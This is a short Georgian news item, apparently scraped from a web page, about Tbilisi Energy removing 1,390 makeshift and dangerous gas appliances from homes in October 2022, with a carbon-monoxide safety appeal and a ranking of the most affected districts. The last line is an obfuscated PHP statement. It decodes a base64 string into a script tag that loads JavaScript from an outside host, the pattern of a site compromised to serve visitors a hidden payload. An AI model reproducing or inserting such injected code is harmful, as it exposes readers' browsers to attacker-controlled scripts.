celsiusi
ავერსი საქკაბელი
კომპანია „თბილისი ენერჯის“ ინფორმაციით, 2022 წლის ოქტომბერში „თბილისი ენერჯის“ სპეციალისტებმა, დედაქალაქის მასშტაბით, 1390 კუსტარული და „მკვლელი“ გაზის დანადგარი საცხოვრებელი ბინებიდან ჩახსნეს.
 
კომპანია „თბილისი ენერჯის“ ინფორმაციით, 2022 წლის ოქტომბერში „თბილისი ენერჯის“ სპეციალისტებმა, დედაქალაქის მასშტაბით, 1390 კუსტარული და მკვლელი გაზის დანადგარი ჩახსნეს საცხოვრებელი ბინებიდან. საუბარია ღია კამერიან წყლის გამაცხელებლებზე ე.წ. კალონკებსა და სხვა კუსტარულად დამონტაჟებულ გაზის დანადგარებზე.
 
„ეს ნიშნავს რომ ასეულობით ოჯახი co-თი (ცეო) ინტოქსიკაციას და ყველაზე მძიმე შემთხვევაში სიკვდილს გადარჩა. „თბილისი ენერჯი“ გთხოვთ გამოიჩინოთ მაღალი პასუხისმგებლობა საკუთარი ოჯახის და მეზობლების უსაფრთხოებისთვის. დაიცავით გაზის უსაფრთხო მოხმარების აუცილებელი წესები (უსაფრთხოების შესახებ აუცილებელი წესები იხილეთ კომპანიის ვებგვერდზე te.ge, ასევე ფეისბუქის ოფიციალურ გვერდზე)“, - ნათქვამია გავრცელებულ რელიზში.
 
კომპანიის ინფორმაციითვე, გაზის კუსტარული დანადგარების მოხმარების და ჩახსნის მონაცემებით, თბილისის ყველაზე საშიში უბნების სიაში პირველ ადგილზეა ისანი. შემდეგ მოდის სამგორი და ვაზისუბანი. ამ უბნებში ჯამში 517 კუსტარული დანადგარი ჩახსნეს თბილისი ენერჯის სპეციალისტებმა. მათი დიდი ნაწილი განმეორებით ჩაიხსნა.
432
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");